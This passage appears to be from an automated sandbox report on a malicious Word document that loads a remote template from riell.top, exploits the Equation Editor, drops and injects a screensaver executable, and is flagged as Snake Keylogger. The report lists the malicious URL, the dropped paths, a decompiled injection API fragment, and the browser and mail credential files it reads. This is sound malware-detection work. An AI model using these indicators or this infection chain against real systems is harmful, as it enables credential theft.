            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_005740AD push ecx; ret 8_2_005740AF
            Source: obb[1].scr.8.drStatic PE information: section name: .text entropy: 7.37475269907409
            Source: obi23456.scr.8.drStatic PE information: section name: .text entropy: 7.37475269907409

            Persistence and Installation Behavior

            barindex
            Microsoft Office launches external ms-search protocol handler (WebDAV)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRootJump to behavior
            Contains an external reference to another file
            Source: settings.xml.relsExtracted files from sample: https://riell.top/obb.doc
            Drops PE files with a suspicious file extension
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Office drops RTF file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: obb[1].doc.0.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 91894CAD.doc.0.drJump to dropped file
            Office viewer loads remote template
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Source: C:\Users\user\AppData\Roaming\obi23456.scrRegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 260000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 2160000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 1E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrWindow / User API: threadDelayed 9713Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3340Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3532Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616Thread sleep time: -17524406870024063s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616Thread sleep time: -7800000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620Thread sleep count: 9713 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620Thread sleep count: 98 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_001CFCB8 LdrInitializeThunk,10_2_001CFCB8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrQueries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrQueries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

            Mitre Att&ck Matrix

